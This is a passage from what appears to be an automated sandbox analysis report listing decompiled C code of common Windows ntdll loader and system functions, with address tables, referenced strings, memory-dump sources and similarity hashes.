																	_t134 = _v20;
																	L55:
																	E05469D2E(_t134, 1, _v32, _v28,  *(_v24 + 0x24) & 0x0000ffff,  *((intOrPtr*)(_v24 + 0x28)));
																}
															}
															L30:
															 *_t118 =  *_t118 + 1;
															asm("adc dword [ebx+0x4], 0x0");
															E053AFFB0(_t118, _t156, 0x54886cc);
															goto L22;
														} else {
															if(__eflags < 0) {
																goto L22;
															} else {
																__eflags = _t168 -  *((intOrPtr*)(_t118 + 0x28));
																if(_t168 <  *((intOrPtr*)(_t118 + 0x28))) {
																	goto L22;
																} else {
																	goto L29;
																}
															}
														}
													}
													goto L56;
												}
												goto L22;
											}
											asm("lock inc dword [eax]");
											goto L21;
										}
									}
								}
							}
						}
						return _t143;
					}
				} else {
					_push( &_v8);
					_push( *((intOrPtr*)(__ecx + 0x50)));
					_push(__ecx + 0x40);
					_push(_t121);
					_push(0xffffffff);
					_t80 = E053D9A00();
					_t159 = _t80;
					if(_t159 < 0) {
						L8:
						return _t80;
					} else {
						goto L2;
					}
				}
				L56:
			}

0x053a8799
0x053a879d
0x053a87a1
0x053a87a3
0x053a87a8
0x053a87c3
0x053a87c3
0x053a87c8
0x053a87d1
0x053a87d4
0x053a87d8
0x053a87e5
0x053a87ec
0x053f9bfe
0x053f9c00
0x053f9c02
0x053f9c08
0x053f9c0d
0x053f9c0f
0x053f9c14
0x053f9c2d
0x053f9c32
0x053f9c37
0x053f9c3a
0x053f9c3c
0x053f9c42
0x053f9c42
0x053f9c3c
0x053f9c02
0x053a87da
0x053a87df
0x053a87e3
0x00000000
0x00000000
0x053a87e3
0x053a87f2
0x00000000
0x053a87fb
0x053a87fd
0x053a87fe
0x053a880e
0x053a880f
0x053a8810
0x053a8814
0x053a881a
0x053a881c
0x053a881f
0x053a8821
0x053a8822
0x053a8824
0x053a8826
0x053a882c
0x053a882e
0x053f9c48
0x053f9c48
0x053a8834
0x053a8834
0x053a8837
0x00000000
0x00000000
0x053a8837
0x053a882e
0x053a883d
0x053a8840
0x053a8843
0x053a8846
0x053a8849
0x053a884c
0x053a884e
0x053a8850
0x053a8852
0x053a8854
0x053a8857
0x053a88b4
0x053a88b6
0x053a88b6
0x053a8859
0x053a8859
0x053a8859
0x053a8861
0x053a8866
0x053a886a
0x053a893d
0x053a8941
0x00000000
0x053a8947
0x053a8947
0x053a894a
0x053a894c
0x00000000
0x053a8952
0x053a8955
0x053a895a
0x053a895d
0x053a895d
0x053a895f
0x053a8961
0x053a8961
0x053a8968
0x00000000
0x00000000
0x053a896a
0x053a896b
0x053a896e
0x00000000
0x053a8970
0x053a8970
0x053a8970
0x053a8970
0x053a8972
0x053a8972
0x053a8974
0x00000000
0x053a897a
0x053a897a
0x053a897d
0x00000000
0x053a8983
0x053f9c65
0x053f9c6d
0x053f9c72
0x053f9c75
0x053f9c75
0x053f9c82
0x053f9c86
0x053f9c87
0x053f9c88
0x053f9c89
0x053f9c8c
0x053f9c90
0x053f9c95
0x053f9c97
0x053f9ca0
0x053f9ca3
0x053f9ca9
0x053f9ca9
0x00000000
0x053f9ca9
0x053f9ca3
0x00000000
0x053f9c97
0x053a897d
0x00000000
0x053a8974
0x053a8988
0x053a8992
0x053a8996
0x00000000
0x053a8996
0x053a894c
0x00000000
0x053a8870
0x053a887b
0x053a887d
0x053a887f
0x053a8881
0x053a8884
0x053a8884
0x053a8886
0x053a8889
0x053a888c
0x053a888e
0x053a8891
0x053a8891
0x053a8898
0x00000000
0x00000000
0x053a889a
0x053a889b
0x053a889e
0x00000000
0x00000000
0x053a88a0
0x053a88a8
0x053a88b0
0x053a88b2
0x053a88d3
0x053a88d5
0x00000000
0x053a88d7
0x053a88db
0x053a88dc
0x053a88e0
0x053a88e8
0x053a88ee
0x053a88f0
0x053a88f3
0x053a88fc
0x053a8901
0x053a8906
0x053a890c
0x053a890c
0x053a890f
0x053a8916
0x053a8917
0x053a8918
0x053a8919
0x053a891a
0x053a891f
0x053a8921
0x053f9c52
0x053f9c55
0x053f9c5b
0x053f9cac
0x053f9cc0
0x053f9cc0
0x053f9c55
0x053a8927
0x053a8927
0x053a892f
0x053a8933
0x00000000
0x053a88f5
0x053a88f5
0x00000000
0x053a88f7
0x053a88f7
0x053a88fa
0x00000000
0x00000000
0x00000000
0x00000000
0x053a88fa
0x053a88f5
0x053a88f3
0x00000000
0x053a88d5
0x00000000
0x053a88b2
0x053a88c9
0x00000000
0x053a88c9
0x053a887f
0x053a886a
0x053a8857
0x053a8852
0x053a88bf
0x053a88bf
0x053a87aa
0x053a87ad
0x053a87ae
0x053a87b4
0x053a87b5
0x053a87b6
0x053a87b8
0x053a87bd
0x053a87c1
0x053a87f4
0x053a87fa
0x00000000
0x00000000
0x00000000
0x053a87c1
0x00000000

Strings

minkernel\ntdll\ldrsnap.c, xrefs: 053F9C28
LdrpDoPostSnapWork, xrefs: 053F9C1E
LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x, xrefs: 053F9C18

Memory Dump Source

Source File: 0000000F.00000002.480306194.0000000005370000.00000040.00000001.sdmp, Offset: 05370000, based on PE: true

Associated: 0000000F.00000002.480611341.000000000548B000.00000040.00000001.sdmp Download File
Associated: 0000000F.00000002.480637752.000000000548F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID: LdrpDoPostSnapWork$LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x$minkernel\ntdll\ldrsnap.c
API String ID: 0-1948996284
Opcode ID: a1530e53297f36a19b26c26590843b30ade54aadbb5997ab4234c01407e053ac
Instruction ID: ee1afc001113690b0296958bf4d32282f3742d98323ccef133b60459348bc83e
Opcode Fuzzy Hash: a1530e53297f36a19b26c26590843b30ade54aadbb5997ab4234c01407e053ac
Instruction Fuzzy Hash: BE91E173A04215AFDB19DF59C485ABEB7BAFF44314F14416DE906AB240EBB0ED01CB90

Uniqueness

Uniqueness Score: -1.00%

Function 053A7E41, Relevance: 3.9, Strings: 3, Instructions: 174
COMMON

Download Yara Rule

C-Code - Quality: 98%

			E053A7E41(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				char _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				char _v24;
				signed int _t73;
				void* _t77;
				char* _t82;
				char* _t87;
				signed char* _t97;
				signed char _t102;
				intOrPtr _t107;
				signed char* _t108;
				intOrPtr _t112;
				intOrPtr _t124;
				intOrPtr _t125;
				intOrPtr _t126;

				_t107 = __edx;
				_v12 = __ecx;
				_t125 =  *((intOrPtr*)(__ecx + 0x20));
				_t124 = 0;
				_v20 = __edx;
				if(E053ACEE4( *((intOrPtr*)(_t125 + 0x18)), 1, 0xe,  &_v24,  &_v8) >= 0) {
					_t112 = _v8;
				} else {
					_t112 = 0;
					_v8 = 0;
				}
				if(_t112 != 0) {
					if(( *(_v12 + 0x10) & 0x00800000) != 0) {
						_t124 = 0xc000007b;
						goto L8;
					}
					_t73 =  *(_t125 + 0x34) | 0x00400000;
					 *(_t125 + 0x34) = _t73;
					if(( *(_t112 + 0x10) & 0x00000001) == 0) {
						goto L3;
					}
					 *(_t125 + 0x34) = _t73 | 0x01000000;
					_t124 = E0539C9A4( *((intOrPtr*)(_t125 + 0x18)));
					if(_t124 < 0) {
						goto L8;
					} else {
						goto L3;
					}
				} else {
					L3:
					if(( *(_t107 + 0x16) & 0x00002000) == 0) {
						 *(_t125 + 0x34) =  *(_t125 + 0x34) & 0xfffffffb;
						L8:
						return _t124;
					}
					if(( *( *((intOrPtr*)(_t125 + 0x5c)) + 0x10) & 0x00000080) != 0) {
						if(( *(_t107 + 0x5e) & 0x00000080) != 0) {
							goto L5;
						}
						_t102 =  *0x5485780; // 0x0
						if((_t102 & 0x00000003) != 0) {
							E05415510("minkernel\\ntdll\\ldrmap.c", 0x363, "LdrpCompleteMapModule", 0, "Could not validate the crypto signature for DLL %wZ\n", _t125 + 0x24);
							_t102 =  *0x5485780; // 0x0
						}
						if((_t102 & 0x00000010) != 0) {
							asm("int3");
						}
						_t124 = 0xc0000428;
						goto L8;
					}
					L5:
					if(( *(_t125 + 0x34) & 0x01000000) != 0) {
						goto L8;
					}
					_t77 = _a4 - 0x40000003;
					if(_t77 == 0 || _t77 == 0x33) {
						_v16 =  *((intOrPtr*)(_t125 + 0x18));
						if(E053B7D50() != 0) {
							_t82 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
						} else {
							_t82 = 0x7ffe0384;
						}
						_t108 = 0x7ffe0385;
						if( *_t82 != 0) {
							if(( *( *[fs:0x30] + 0x240) & 0x00000004) != 0) {
								if(E053B7D50() == 0) {
									_t97 = 0x7ffe0385;
								} else {
									_t97 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
								}
								if(( *_t97 & 0x00000020) != 0) {
									E05417016(0x1490, _v16, 0xffffffff, 0xffffffff, 0, 0);
								}
							}
						}
						if(_a4 != 0x40000003) {
							L14:
							_t126 =  *((intOrPtr*)(_t125 + 0x18));
							if(E053B7D50() != 0) {
								_t87 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
							} else {
								_t87 = 0x7ffe0384;
							}
							if( *_t87 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000004) != 0) {
								if(E053B7D50() != 0) {
									_t108 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
								}
								if(( *_t108 & 0x00000020) != 0) {
									E05417016(0x1491, _t126, 0xffffffff, 0xffffffff, 0, 0);
								}
							}
							goto L8;
						} else {
							_v16 = _t125 + 0x24;
							_t124 = E053CA1C3( *((intOrPtr*)(_t125 + 0x18)),  *((intOrPtr*)(_v12 + 0x5c)), _v20, _t125 + 0x24);
							if(_t124 < 0) {
								E0539B1E1(_t124, 0x1490, 0, _v16);
								goto L8;
							}
							goto L14;
						}
					} else {
						goto L8;
					}
				}
			}

0x053a7e4c
0x053a7e50
0x053a7e55
0x053a7e58
0x053a7e5d
0x053a7e71
0x053a7f33
0x053a7e77
0x053a7e77
0x053a7e79
0x053a7e79
0x053a7e7e
0x053a7f45
0x053f9848
0x00000000
0x053f9848
0x053a7f4e
0x053a7f53
0x053a7f5a
0x00000000
0x00000000
0x053f985a
0x053f9862
0x053f9866
0x00000000
0x053f986c
0x00000000
0x053f986c
0x053a7e84
0x053a7e84
0x053a7e8d
0x053f9871
0x053a7eb8
0x053a7ec0
0x053a7ec0
0x053a7e9a
0x053f987e
0x00000000
0x00000000
0x053f9884
0x053f988b
0x053f98a7
0x053f98ac
0x053f98b1
0x053f98b6
0x053f98b8
0x053f98b8
0x053f98b9
0x00000000
0x053f98b9
0x053a7ea0
0x053a7ea7
0x00000000
0x00000000
0x053a7eac
0x053a7eb1
0x053a7ec6
0x053a7ed0
0x053f98cc
0x053a7ed6
0x053a7ed6
0x053a7ed6
0x053a7ede
0x053a7ee3
0x053f98e3
0x053f98f0
0x053f9902
0x053f98f2
0x053f98fb
0x053f98fb
0x053f9907
0x053f991d
0x053f991d
0x053f9907
0x053f98e3
0x053a7ef0
0x053a7f14
0x053a7f14
0x053a7f1e
0x053f9946
0x053a7f24
0x053a7f24
0x053a7f24
0x053a7f2c
0x053f996a
0x053f9975
0x053f9975
0x053f997e
0x053f9993
0x053f9993
0x053f997e
0x00000000
0x053a7ef2
0x053a7efc
0x053a7f0a
0x053a7f0e
0x053f9933
0x00000000
0x053f9933
0x00000000
0x053a7f0e
0x00000000
0x00000000
0x00000000
0x053a7eb1

Strings

Could not validate the crypto signature for DLL %wZ, xrefs: 053F9891
minkernel\ntdll\ldrmap.c, xrefs: 053F98A2
LdrpCompleteMapModule, xrefs: 053F9898

Memory Dump Source

Source File: 0000000F.00000002.480306194.0000000005370000.00000040.00000001.sdmp, Offset: 05370000, based on PE: true

Associated: 0000000F.00000002.480611341.000000000548B000.00000040.00000001.sdmp Download File
Associated: 0000000F.00000002.480637752.000000000548F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID: Could not validate the crypto signature for DLL %wZ$LdrpCompleteMapModule$minkernel\ntdll\ldrmap.c
API String ID: 0-1676968949
Opcode ID: 0233e4fde891e981697b4b9249263889177516f50753515f679b25b5509bbe8f
Instruction ID: 1d3fca399c68683762f41df6a3b374f5b40986505c1303ecb89000ea3837f71b
Opcode Fuzzy Hash: 0233e4fde891e981697b4b9249263889177516f50753515f679b25b5509bbe8f
Instruction Fuzzy Hash: DB51F533B047859BE729CB68C988F6A7BE9FB40314F040599E9529B7D2D7B4ED00C791

Uniqueness

Uniqueness Score: -1.00%

Function 0539E620, Relevance: 3.9, Strings: 3, Instructions: 165
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E0539E620(void* __ecx, short* __edx, short* _a4) {
				char _v16;
				char _v20;
				intOrPtr _v24;
				char* _v28;
				char _v32;
				char _v36;
				char _v44;
				signed int _v48;
				intOrPtr _v52;
				void* _v56;
				void* _v60;
				char _v64;
				void* _v68;
				void* _v76;
				void* _v84;
				signed int _t59;
				signed int _t74;
				signed short* _t75;
				signed int _t76;
				signed short* _t78;
				signed int _t83;
				short* _t93;
				signed short* _t94;
				short* _t96;
				void* _t97;
				signed int _t99;
				void* _t101;
				void* _t102;

				_t80 = __ecx;
				_t101 = (_t99 & 0xfffffff8) - 0x34;
				_t96 = __edx;
				_v44 = __edx;
				_t78 = 0;
				_v56 = 0;
				if(__ecx == 0 || __edx == 0) {
					L28:
					_t97 = 0xc000000d;
				} else {
					_t93 = _a4;
					if(_t93 == 0) {
						goto L28;
					}
					_t78 = E0539F358(__ecx, 0xac);
					if(_t78 == 0) {
						_t97 = 0xc0000017;
						L6:
						if(_v56 != 0) {
							_push(_v56);
							E053D95D0();
						}
						if(_t78 != 0) {
							L053B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t78);
						}
						return _t97;
					}
					E053DFA60(_t78, 0, 0x158);
					_v48 = _v48 & 0x00000000;
					_t102 = _t101 + 0xc;
					 *_t96 = 0;
					 *_t93 = 0;
					E053DBB40(_t80,  &_v36, L"\\Registry\\Machine\\System\\CurrentControlSet\\Control\\NLS\\Language");
					_v36 = 0x18;
					_v28 =  &_v44;
					_v64 = 0;
					_push( &_v36);
					_push(0x20019);
					_v32 = 0;
					_push( &_v64);
					_v24 = 0x40;
					_v20 = 0;
					_v16 = 0;
					_t97 = E053D9600();
					if(_t97 < 0) {
						goto L6;
					}
					E053DBB40(0,  &_v36, L"InstallLanguageFallback");
					_push(0);
					_v48 = 4;
					_t97 = L0539F018(_v64,  &_v44,  &_v56, _t78,  &_v48);
					if(_t97 >= 0) {
						if(_v52 != 1) {
							L17:
							_t97 = 0xc0000001;
							goto L6;
						}
						_t59 =  *_t78 & 0x0000ffff;
						_t94 = _t78;
						_t83 = _t59;
						if(_t59 == 0) {
							L19:
							if(_t83 == 0) {
								L23:
								E053DBB40(_t83, _t102 + 0x24, _t78);
								if(L053A43C0( &_v48,  &_v64) == 0) {
									goto L17;
								}
								_t84 = _v48;
								 *_v48 = _v56;
								if( *_t94 != 0) {
									E053DBB40(_t84, _t102 + 0x24, _t94);
									if(L053A43C0( &_v48,  &_v64) != 0) {
										 *_a4 = _v56;
									} else {
										_t97 = 0xc0000001;
										 *_v48 = 0;
									}
								}
								goto L6;
							}
							_t83 = _t83 & 0x0000ffff;
							while(_t83 == 0x20) {
								_t94 =  &(_t94[1]);
								_t74 =  *_t94 & 0x0000ffff;
								_t83 = _t74;
								if(_t74 != 0) {
									continue;
								}
								goto L23;
							}
							goto L23;
						} else {
							goto L14;
						}
						while(1) {
							L14:
							_t27 =  &(_t94[1]); // 0x2
							_t75 = _t27;
							if(_t83 == 0x2c) {
								break;
							}
							_t94 = _t75;
							_t76 =  *_t94 & 0x0000ffff;
							_t83 = _t76;
							if(_t76 != 0) {
								continue;
							}
							goto L23;
						}
						 *_t94 = 0;
						_t94 = _t75;
						_t83 =  *_t75 & 0x0000ffff;
						goto L19;
					}
				}
			}

0x0539e620
0x0539e628
0x0539e62f
0x0539e631
0x0539e635
0x0539e637
0x0539e63e
0x053f5503
0x053f5503
0x0539e64c
0x0539e64c
0x0539e651
0x00000000
0x00000000
0x0539e661
0x0539e665
0x053f542a
0x0539e715
0x0539e71a
0x0539e71c
0x0539e720
0x0539e720
0x0539e727
0x0539e736
0x0539e736
0x0539e743
0x0539e743
0x0539e673
0x0539e678
0x0539e67d
0x0539e682
0x0539e685
0x0539e692
0x0539e69b
0x0539e6a3
0x0539e6ad
0x0539e6b1
0x0539e6b2
0x0539e6bb
0x0539e6bf
0x0539e6c0
0x0539e6c8
0x0539e6cc
0x0539e6d5
0x0539e6d9
0x00000000
0x00000000
0x0539e6e5
0x0539e6ea
0x0539e6f9
0x0539e70b
0x0539e70f
0x053f5439
0x053f545e
0x053f545e
0x00000000
0x053f545e
0x053f543b
0x053f543e
0x053f5440
0x053f5445
0x053f5472
0x053f5475
0x053f548d
0x053f5493
0x053f54a9
0x00000000
0x00000000
0x053f54ab
0x053f54b4
0x053f54bc
0x053f54c8
0x053f54de
0x053f54fb
0x053f54e0
0x053f54e6
0x053f54eb
0x053f54eb
0x053f54de
0x00000000
0x053f54bc
0x053f5477
0x053f547a
0x053f5480
0x053f5483
0x053f5486
0x053f548b
0x00000000
0x00000000
0x00000000
0x053f548b
0x00000000
0x00000000
0x00000000
0x00000000
0x053f5447
0x053f5447
0x053f5447
0x053f5447
0x053f544e
0x00000000
0x00000000
0x053f5450
0x053f5452
0x053f5455
0x053f545a
0x00000000
0x00000000
0x00000000
0x053f545c
0x053f546a
0x053f546d
0x053f546f
0x00000000
0x053f546f
0x0539e70f

Strings

@, xrefs: 0539E6C0
InstallLanguageFallback, xrefs: 0539E6DB
\Registry\Machine\System\CurrentControlSet\Control\NLS\Language, xrefs: 0539E68C

Memory Dump Source

Source File: 0000000F.00000002.480306194.0000000005370000.00000040.00000001.sdmp, Offset: 05370000, based on PE: true

Associated: 0000000F.00000002.480611341.000000000548B000.00000040.00000001.sdmp Download File
Associated: 0000000F.00000002.480637752.000000000548F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID: @$InstallLanguageFallback$\Registry\Machine\System\CurrentControlSet\Control\NLS\Language
API String ID: 0-1757540487
Opcode ID: e1c25622e4f6f9b6d3a16ccac65e457abd12820172d8796a11a06ebd618df233
Instruction ID: 3a2e1e4673f5aac4561cb8da5597b33708a0b82752d85892ba982f697c9d4a7a
Opcode Fuzzy Hash: e1c25622e4f6f9b6d3a16ccac65e457abd12820172d8796a11a06ebd618df233
Instruction Fuzzy Hash: 1951D1B66083459BCB14DF64C444A7BB3EDBF88614F05092EFA86D7240FB74DA14CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 0539B171, Relevance: 1.7, APIs: 1, Instructions: 166
COMMON

Download Yara Rule

C-Code - Quality: 78%

			E0539B171(signed short __ebx, intOrPtr __ecx, intOrPtr* __edx, intOrPtr* __edi, signed short __esi, void* __eflags) {
				signed int _t65;
				signed short _t69;
				intOrPtr _t70;
				signed short _t85;
				void* _t86;
				signed short _t89;
				signed short _t91;
				intOrPtr _t92;
				intOrPtr _t97;
				intOrPtr* _t98;
				signed short _t99;
				signed short _t101;
				void* _t102;
				char* _t103;
				signed short _t104;
				intOrPtr* _t110;
				void* _t111;
				void* _t114;
				intOrPtr* _t115;

				_t109 = __esi;
				_t108 = __edi;
				_t106 = __edx;
				_t95 = __ebx;
				_push(0x90);
				_push(0x546f7a8);
				E053ED0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t114 - 0x9c)) = __edx;
				 *((intOrPtr*)(_t114 - 0x84)) = __ecx;
				 *((intOrPtr*)(_t114 - 0x8c)) =  *((intOrPtr*)(_t114 + 0xc));
				 *((intOrPtr*)(_t114 - 0x88)) =  *((intOrPtr*)(_t114 + 0x10));
				 *((intOrPtr*)(_t114 - 0x78)) =  *[fs:0x18];
				if(__edx == 0xffffffff) {
					L6:
					_t97 =  *((intOrPtr*)(_t114 - 0x78));
					_t65 =  *(_t97 + 0xfca) & 0x0000ffff;
					__eflags = _t65 & 0x00000002;
					if((_t65 & 0x00000002) != 0) {
						L3:
						L4:
						return E053ED130(_t95, _t108, _t109);
					}
					 *(_t97 + 0xfca) = _t65 | 0x00000002;
					_t108 = 0;
					_t109 = 0;
					_t95 = 0;
					__eflags = 0;
					while(1) {
						__eflags = _t95 - 0x200;
						if(_t95 >= 0x200) {
							break;
						}
						E053DD000(0x80);
						 *((intOrPtr*)(_t114 - 0x18)) = _t115;
						_t108 = _t115;
						_t95 = _t95 - 0xffffff80;
						_t17 = _t114 - 4;
						 *_t17 =  *(_t114 - 4) & 0x00000000;
						__eflags =  *_t17;
						_t106 =  *((intOrPtr*)(_t114 - 0x84));
						_t110 =  *((intOrPtr*)(_t114 - 0x84));
						_t102 = _t110 + 1;
						do {
							_t85 =  *_t110;
							_t110 = _t110 + 1;
							__eflags = _t85;
						} while (_t85 != 0);
						_t111 = _t110 - _t102;
						_t21 = _t95 - 1; // -129
						_t86 = _t21;
						__eflags = _t111 - _t86;
						if(_t111 > _t86) {
							_t111 = _t86;
						}
						E053DF3E0(_t108, _t106, _t111);
						_t115 = _t115 + 0xc;
						_t103 = _t111 + _t108;
						 *((intOrPtr*)(_t114 - 0x80)) = _t103;
						_t89 = _t95 - _t111;
						__eflags = _t89;
						_push(0);
						if(_t89 == 0) {
							L15:
							_t109 = 0xc000000d;
							goto L16;
						} else {
							__eflags = _t89 - 0x7fffffff;
							if(_t89 <= 0x7fffffff) {
								L16:
								 *(_t114 - 0x94) = _t109;
								__eflags = _t109;
								if(_t109 < 0) {
									__eflags = _t89;
									if(_t89 != 0) {
										 *_t103 = 0;
									}
									L26:
									 *(_t114 - 0xa0) = _t109;
									 *(_t114 - 4) = 0xfffffffe;
									__eflags = _t109;
									if(_t109 >= 0) {
										L31:
										_t98 = _t108;
										_t39 = _t98 + 1; // 0x1
										_t106 = _t39;
										do {
											_t69 =  *_t98;
											_t98 = _t98 + 1;
											__eflags = _t69;
										} while (_t69 != 0);
										_t99 = _t98 - _t106;
										__eflags = _t99;
										L34:
										_t70 =  *[fs:0x30];
										__eflags =  *((char*)(_t70 + 2));
										if( *((char*)(_t70 + 2)) != 0) {
											L40:
											 *((intOrPtr*)(_t114 - 0x74)) = 0x40010006;
											 *(_t114 - 0x6c) =  *(_t114 - 0x6c) & 0x00000000;
											 *((intOrPtr*)(_t114 - 0x64)) = 2;
											 *(_t114 - 0x70) =  *(_t114 - 0x70) & 0x00000000;
											 *((intOrPtr*)(_t114 - 0x60)) = (_t99 & 0x0000ffff) + 1;
											 *((intOrPtr*)(_t114 - 0x5c)) = _t108;
											 *(_t114 - 4) = 1;
											_push(_t114 - 0x74);
											L053EDEF0(_t99, _t106);
											 *(_t114 - 4) = 0xfffffffe;
											 *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) =  *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) & 0x0000fffd;
											goto L3;
										}
										__eflags = ( *0x7ffe02d4 & 0x00000003) - 3;
										if(( *0x7ffe02d4 & 0x00000003) != 3) {
											goto L40;
										}
										_push( *((intOrPtr*)(_t114 + 8)));
										_push( *((intOrPtr*)(_t114 - 0x9c)));
										_push(_t99 & 0x0000ffff);
										_push(_t108);
										_push(1);
										_t101 = E053DB280();
										__eflags =  *((char*)(_t114 + 0x14)) - 1;
										if( *((char*)(_t114 + 0x14)) == 1) {
											__eflags = _t101 - 0x80000003;
											if(_t101 == 0x80000003) {
												E053DB7E0(1);
												_t101 = 0;
												__eflags = 0;
											}
										}
										 *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) =  *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) & 0x0000fffd;
										goto L4;
									}
									__eflags = _t109 - 0x80000005;
									if(_t109 == 0x80000005) {
										continue;
									}
									break;
								}
								 *(_t114 - 0x90) = 0;
								 *((intOrPtr*)(_t114 - 0x7c)) = _t89 - 1;
								_t91 = E053DE2D0(_t103, _t89 - 1,  *((intOrPtr*)(_t114 - 0x8c)),  *((intOrPtr*)(_t114 - 0x88)));
								_t115 = _t115 + 0x10;
								_t104 = _t91;
								_t92 =  *((intOrPtr*)(_t114 - 0x7c));
								__eflags = _t104;
								if(_t104 < 0) {
									L21:
									_t109 = 0x80000005;
									 *(_t114 - 0x90) = 0x80000005;
									L22:
									 *((char*)(_t92 +  *((intOrPtr*)(_t114 - 0x80)))) = 0;
									L23:
									 *(_t114 - 0x94) = _t109;
									goto L26;
								}
								__eflags = _t104 - _t92;
								if(__eflags > 0) {
									goto L21;
								}
								if(__eflags == 0) {
									goto L22;
								}
								goto L23;
							}
							goto L15;
						}
					}
					__eflags = _t109;
					if(_t109 >= 0) {
						goto L31;
					}
					__eflags = _t109 - 0x80000005;
					if(_t109 != 0x80000005) {
						goto L31;
					}
					 *((short*)(_t95 + _t108 - 2)) = 0xa;
					_t38 = _t95 - 1; // -129
					_t99 = _t38;
					goto L34;
				}
				if( *((char*)( *[fs:0x30] + 2)) != 0) {
					__eflags = __edx - 0x65;
					if(__edx != 0x65) {
						goto L2;
					}
					goto L6;
				}
				L2:
				_push( *((intOrPtr*)(_t114 + 8)));
				_push(_t106);
				if(E053DA890() != 0) {
					goto L6;
				}
				goto L3;
			}

0x0539b171
0x0539b171
0x0539b171
0x0539b171
0x0539b171
0x0539b176
0x0539b17b
0x0539b180
0x0539b186
0x0539b18f
0x0539b198
0x0539b1a4
0x0539b1aa
0x053f4802
0x053f4802
0x053f4805
0x053f480c
0x053f480e
0x0539b1d1
0x0539b1d3
0x0539b1de
0x0539b1de
0x053f4817
0x053f481e
0x053f4820
0x053f4822
0x053f4822
0x053f4824
0x053f4824
0x053f482a
0x00000000
0x00000000
0x053f4835
0x053f483a
0x053f483d
0x053f483f
0x053f4842
0x053f4842
0x053f4842
0x053f4846
0x053f484c
0x053f484e
0x053f4851
0x053f4851
0x053f4853
0x053f4854
0x053f4854
0x053f4858
0x053f485a
0x053f485a
0x053f485d
0x053f485f
0x053f4861
0x053f4861
0x053f4866
0x053f486b
0x053f486e
0x053f4871
0x053f4876
0x053f4876
0x053f4878
0x053f487b
0x053f4884
0x053f4884
0x00000000
0x053f487d
0x053f487d
0x053f4882
0x053f4889
0x053f4889
0x053f488f
0x053f4891
0x053f48e0
0x053f48e2
0x053f48e4
0x053f48e4
0x053f48e7
0x053f48e7
0x053f48ed
0x053f48f4
0x053f48f6
0x053f4951
0x053f4951
0x053f4953
0x053f4953
0x053f4956
0x053f4956
0x053f4958
0x053f4959
0x053f4959
0x053f495d
0x053f495d
0x053f495f
0x053f495f
0x053f4965
0x053f4969
0x053f49ba
0x053f49ba
0x053f49c1
0x053f49c5
0x053f49cc
0x053f49d4
0x053f49d7
0x053f49da
0x053f49e4
0x053f49e5
0x053f49f3
0x053f4a02
0x00000000
0x053f4a02
0x053f4972
0x053f4974
0x00000000
0x00000000
0x053f4976
0x053f4979
0x053f4982
0x053f4983
0x053f4984
0x053f498b
0x053f498d
0x053f4991
0x053f4993
0x053f4999
0x053f499d
0x053f49a2
0x053f49a2
0x053f49a2
0x053f4999
0x053f49ac
0x00000000
0x053f49b3
0x053f48f8
0x053f48fe
0x00000000
0x00000000
0x00000000
0x053f48fe
0x053f4895
0x053f489c
0x053f48ad
0x053f48b2
0x053f48b5
0x053f48b7
0x053f48ba
0x053f48bc
0x053f48c6
0x053f48c6
0x053f48cb
0x053f48d1
0x053f48d4
0x053f48d8
0x053f48d8
0x00000000
0x053f48d8
0x053f48be
0x053f48c0
0x00000000
0x00000000
0x053f48c2
0x00000000
0x00000000
0x00000000
0x053f48c4
0x00000000
0x053f4882
0x053f487b
0x053f4904
0x053f4906
0x00000000
0x00000000
0x053f4908
0x053f490e
0x00000000
0x00000000
0x053f4910
0x053f4917
0x053f4917
0x00000000
0x053f4917
0x0539b1ba
0x053f47f9
0x053f47fc
0x00000000
0x00000000
0x00000000
0x053f47fc
0x0539b1c0
0x0539b1c0
0x0539b1c3
0x0539b1cb
0x00000000
0x00000000
0x00000000

APIs

_vswprintf_s.LIBCMT ref: 053F48AD

Memory Dump Source

Source File: 0000000F.00000002.480306194.0000000005370000.00000040.00000001.sdmp, Offset: 05370000, based on PE: true

Associated: 0000000F.00000002.480611341.000000000548B000.00000040.00000001.sdmp Download File
Associated: 0000000F.00000002.480637752.000000000548F000.00000040.00000001.sdmp Download File

Similarity

API ID: _vswprintf_s
String ID:
API String ID: 677850445-0
Opcode ID: e7ee7c20365ef5e4f8ca44ebe0e399c3ca9e1711b57032fc4b52ef5a6022f435
Instruction ID: 19522ffd585a96935341ee7b82fd536102dd835383a4e6b74d865d9232b5b855
Opcode Fuzzy Hash: e7ee7c20365ef5e4f8ca44ebe0e399c3ca9e1711b57032fc4b52ef5a6022f435
Instruction Fuzzy Hash: F151EE72E042698BDF36CF68D844BBFBBF1BF00710F1041ADDA59AB281D7B549818B91

Uniqueness

Uniqueness Score: -1.00%

Function 053BB944, Relevance: 1.7, APIs: 1, Instructions: 166
COMMON

Download Yara Rule

C-Code - Quality: 76%

			E053BB944(signed int* __ecx, char __edx) {
				signed int _v8;
				signed int _v16;
				signed int _v20;
				char _v28;
				signed int _v32;
				char _v36;
				signed int _v40;
				intOrPtr _v44;
				signed int* _v48;
				signed int _v52;
				signed int _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				char _v77;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t65;
				intOrPtr _t67;
				intOrPtr _t68;
				char* _t73;
				intOrPtr _t77;
				intOrPtr _t78;
				signed int _t82;
